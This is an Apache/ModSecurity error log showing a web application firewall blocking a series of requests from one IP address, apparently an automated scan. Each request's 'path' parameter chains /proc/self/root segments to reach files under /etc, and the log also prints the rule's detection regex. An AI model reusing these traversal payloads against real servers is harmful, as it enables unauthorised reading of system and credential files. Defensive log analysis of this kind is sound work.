[Wed Mar 18 09:50:32.226894 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:39134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfmMdf6f5d65gmYZTLbwAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:33.530839 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:39138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfmdY0UrI5A3LftIybcAAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:34.827349 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:39152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfmuoXxyEfFpUF8f9kzAAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:36.143112 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:39154] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfnEzinOy1jxa1j4cKvAAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:37.490554 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:39162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfnSmAPhZkrhU8w4ljjwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:39.777670 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:39170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfnimAPhZkrhU8w4ljkAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:42.398235 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:52620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfoeyqAr6etmhZHNq1ywAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:46.547098 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:52626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfpta6ubjKNq_cu4aPqQAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:50.902673 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:52632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfp9a6ubjKNq_cu4aPqwAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:52.723016 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:45730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfrMdf6f5d65gmYZTLeAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:54.117995 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:45744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfrvu8EFLIOrSqIpv7mAAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:55.430995 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:45752] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfr9Y0UrI5A3LftIybggAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:56.774115 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:45760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfsOoXxyEfFpUF8f9k1AAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:58.107729 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.243.128:45764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfsimAPhZkrhU8w4ljmQAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:50:59.465669 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:42522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfs9Y0UrI5A3LftIybiwAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:00.759692 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:42528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqftOyqAr6etmhZHNq13AAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:02.263166 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:42542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqftta6ubjKNq_cu4aPvgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:03.552793 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:42556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqft8df6f5d65gmYZTLgAAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:04.842521 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:42560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfuOw_le52K8_3pV3WQgAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:06.147551 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:42576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfuvu8EFLIOrSqIpv7ogAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:09.871555 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:42586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfvfu8EFLIOrSqIpv7qgAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
